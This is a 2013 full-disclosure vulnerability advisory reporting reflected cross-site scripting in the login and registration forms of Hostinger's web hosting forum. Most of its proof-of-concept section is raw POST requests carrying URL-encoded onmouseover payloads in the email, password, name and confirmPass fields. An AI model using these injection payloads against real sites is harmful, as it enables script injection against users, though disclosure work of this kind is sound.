Hostinger Web Hosting Multiple Cross Site Scripting Report-Timeline: ================ 2013-06-01: Researcher Notification 2013-06-03: RESPONSE 2013-06-07: Ask About the issues 2013-06-10: Vendor Feedback 2013-06-13: Not Fixed 2013-06-16: Full Disclosure I-VULNERABILITY ------------------------- #Title: Hostinger Web Hosting Multiple Cross Site Scripting #Vendor:http://www.hostinger.es #Author:Juan Carlos García (@secnight) #Follow me http://www.highsec.es HTTP://WWW.radio3w.com http://hackingmadrid.blogspot.com http://blogs.0verl0ad.com Twitter:@secnight Facebook:https://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?ref=tn_tnmn II-Introduction: ============= Hostinger® is a free and affordable premium web hosting services provider and domain registrar. Hostinger has grown from a small web hosting provider into a world leading and industry recognized web hosting brand. Hostinger, UAB is proud to be a part of elite ICANN accredited registrars community. Hostinger has successfully localized services in Indonesia, Philippines, Spain, Italy, France, Poland, Romania, Lithuania, Brazil, Argentina, Mexico, Columbia, Russia, Ukraine, and many more countries on their way! ------------------------- III-PROOF OF CONCEPT ============= Affected items /forum/login (5) /forum/register (8) Attack details /forum/login ============= URL encoded POST input email was set to " onmouseover=prompt(952323) bad=" The input is reflected inside a tag element between double quotes. POST /forum/login HTTP/1.1 email=%22%20onmouseover%3dprompt%28952323%29%20bad%3d%22&pass=secnight&remember=1 VARIANTS email 2 ------- email=%22%20onmouseover%3dprompt%28952323%29%20bad%3d%22&pass=secnight&remember=1 email=%22%20onmouseover%3dprompt%28982999%29%20bad%3d%22&pass=secnight pass 3 ------- email=secnight@email.tst&pass=%22%20onmouseover%3dprompt%28952904%29%20bad%3d%22&remember=1 email=secnight@email.tst&pass=%22%20onmouseover%3dprompt%28935474%29%20bad%3d%22 email=secnight%40email.tst&pass=%22%20onmouseover%3dprompt%28993589%29%20bad%3d%22&remember=1 /forum/register. ============= URL encoded POST input confirmPass was set to " onmouseover=prompt(943546) bad=" The input is reflected inside a tag element between double quotes. POST /forum/register HTTP/1.1 confirmPass=%22%20onmouseover%3dprompt%28943546%29%20bad%3d%22&email=secnight@email.tst&name=vbhlwxtb&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_chal VARIANTS ---------- ---------- confirmPass 2 ------------- confirmPass=%22%20onmouseover%3dprompt%28943546%29%20bad%3d%22&email=secnight@email.tst&name=vbhlwxtb&pass=Senight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge confirmPass=%22%20onmouseover%3dprompt%28942726%29%20bad%3d%22&email=secnight%40email.tst&name=noeoyclk&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge email 2 -------- confirmPass=secnight&email=%22%20onmouseover%3dprompt%28982353%29%20bad%3d%22&name=mvjmhkny&pass=Secnightx&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge confirmPass=secnightx&email=%22%20onmouseover%3dprompt%28978014%29%20bad%3d%22&name=noeoyclk&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge Name 2 ------- confirmPass=secnight&email=secnight@email.tst&name=%22%20onmouseover%3dprompt%28981310%29%20bad%3d%22&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge confirmPass=SECNIGHT&email=secnight%40email.tst&name=%22%20onmouseover%3dprompt%28946111%29%20bad%3d%22&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge pass 2 ------- confirmPass=secnight&email=secnight@email.tst&name=augbmecb&pass=%22%20onmouseover%3dprompt%28956301%29%20bad%3d%22&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge confirmPass=secnightx&email=secnight%40email.tst&name=noeoyclk&pass=%22%20onmouseover%3dprompt%28972091%29%20bad%3d%22&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge IV. CREDITS ------------------------- This vulnerability has been discovered by Juan Carlos García(@secnight) V. LEGAL NOTICES ------------------------- The Author accepts no responsibility for any damage caused by the use or misuse of this information.